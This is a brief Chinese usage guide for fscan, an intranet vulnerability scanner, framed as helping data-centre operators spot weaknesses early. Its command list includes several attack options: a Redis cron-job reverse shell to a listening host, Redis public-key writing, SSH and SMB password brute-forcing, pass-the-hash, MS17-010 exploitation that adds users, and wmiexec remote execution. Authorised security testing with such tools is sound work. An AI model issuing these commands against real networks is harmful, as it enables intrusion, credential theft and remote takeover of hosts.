机房网络中经常有客户会因为软件更新不及时导致存在安全漏洞而被有关部门警告,提前做好安全感知防患于未然。
fscan 是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
简单用法:
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
fscan.exe -h 192.168.1.1/16 (B 段扫描)
其他用法:
fscan.exe -h 192.168.1.1/24 -np -no -nopoc (跳过存活检测 、不保存文件、跳过 web poc 扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹 shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块 ssh 和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A 段的 192.x.x.1 和 192.x.x.254, 方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb 密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个 url, 并设置 http 代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫 Web poc, 以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入 3389->rdp 扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单 tcp 功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他 ms17010 的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash 碰撞,xxxx:ntlmhash, 如 32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec 无回显命令执行)编译 & 安装:
go build -ldflags="-s -w" -trimpath main.go
upx -9 fscan.exe (可选,压缩体积)
fscan 官网